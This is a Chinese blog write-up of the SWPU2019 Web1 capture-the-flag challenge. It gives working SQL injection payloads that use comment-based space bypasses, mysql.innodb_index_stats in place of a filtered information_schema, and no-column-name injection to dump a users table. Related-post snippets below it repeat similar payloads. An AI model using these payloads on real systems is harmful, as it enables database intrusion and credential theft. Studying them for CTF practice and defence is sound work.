[SWPU2019]Web1

最新推荐文章于 2024-05-14 23:43:15 发布
最新推荐文章于 2024-05-14 23:43:15 发布
阅读量354 收藏 9
点赞数 7
文章标签: 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzqzzq11/article/details/134770626
版权

title=1'union/**/select/**/

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'2&content=32131&ac=add

得到database是web1。

⾛后⾯的流程也出现问题了。发现information_schema表被过滤了。

所以使⽤:mysql.innodb_table_stats 。

title=1'union/**/select/**/1,group_concat(table_name),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_index_stats/**/where/**/database_name="web1"'&content=32131&ac=add

获得表名

接下来要学习新的东⻄:⽆列名注⼊

⽐如我输⼊下⾯的内容,可以看到我的内容全部综合到了如下的表中。

随后把刚刚查询的内容当作⼀个table即可:

因此构造如下输⼊:

title=1'union/**/select/**/1,(select/**/group_concat(b,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/

as/**/c/**/union/**/select/**/*/**/from/**/

users)newtabble),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'&content=32131&ac=add

WHU_Joe.
关注
SWPU2019 Web1(无列名注入、MariaDB)
weixin_52780973的博客
10-31 1058
sql注入、无列名注入、MariaDB
[SWPU2019]Web1(sql
wikey 的博客
03-30 992
因为不能使用or,就不存在information_schema,但是可以使用替代的innodb数据库,当过滤了information_schema时可以用mysql.innodb_table_stats代替information_schema。最终payload:-1’union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select/爆表名,这里不能使用or,所以这里使用的是新的payload。
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4136
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
[BUUCTF][SWPU2019]Web1
朋克归零膏的博客
10-28 609
无列名注入fuzz过滤词绕过空格。
[SWPU2019]Web6
lllffg的博客
03-16 758
[SWPU2019]Web6 SQL注入中的with rollup 利用session.upload_progress进行文件包含和反序列化渗透 一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测 看了下wp 猜测源码太狠了 $sql="select * from users where username='$name' and passwd='$
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
buuctf-[SWPU2019]Web1(小宇特详解)
小宇的web博客
02-26 1674
buuctf-[SWPU2019]Web1(小宇特详解) 1.先看题目 2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方 这里自己注册一个,不要注册admin,不要问我怎么知道的。 这里进去之后是一个广告信息管理 这里使用1’ order by 1# 来测试一下 显示标题有敏感词汇 这里没有源码只能去手动的测试他过滤了啥 最终我发现了她过滤了or # --+和空格 这里想一下绕过的方法 空格可以用/**/来代替 –+注释符的话就用单引号闭合就o
无列名注入----CTF例题:[SWPU2019]Web1
最新发布
qq_64395221的博客
05-14 992
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)as a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,10,21,22/**/&&/**/’1‘=’1---查出users的列名,但没有想要的信息。进入题目后发现有登录和注册接口,直接注册登录。
buuctf [SWPU2019]Web1 记录
SopRomeo的博客
03-14 1367
注册进去发现可以发广告,看到这我马上试了试有没有xss漏洞 可以发现是存在的。emmmm,我用beef上传那个js代码不行。。可能是我太菜了我觉得这道题应该能用xss漏洞做出来。 百度了web 发现广告栏存在sql注入… 学到了,留言板也是放在数据库里的,可能是最近接触xss的缘故没想到吧…太菜了我。 我找到的writeup写的太简略了,我这个菜鸡就写的详细点吧… 在title进行常规sql判...
[SWPU2019]Web1 (bypass information_schema,无列名注入)
qq_52907838的博客
09-26 352
打开环境,是个登录框: 注册账号,登录后,有个广告发布,随便输入后查看详情后会回显: 一下子就会想到是xss,于是我试了一下,果然还真存在xss: 但是后来才知道没用,是个SQL题,注入点在标题那: 按照步骤来,发现or,#都被过滤,空格会被消除,空格简单,用/**/就能绕过,但order by和information_schema都不能用,那咋判断字段数,不会要用union select一个个试吧(那这个题可能要搞傻),其实还可以用group by: 1'/**/group..
BUUCTF [SWPU2019]Web1
qq_56313338的博客
08-27 274
这里将表命名为 x,并且第2个字段命名为a,第三个字段命名b。这是一道sql二次注入题目,但是注入点并不在登录处。获取当前数据库users表的第二列的所有数据。有很多列(我也不知道为啥这么多列…按照猜测,第三列因该就是密码了。admin的密码就是flag。广告申请处进行sql注入。你会发现过滤了很多关键字。就是查询第二列的所有数据。这里用到了一些绕过技巧。注册一个用户然后登录。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值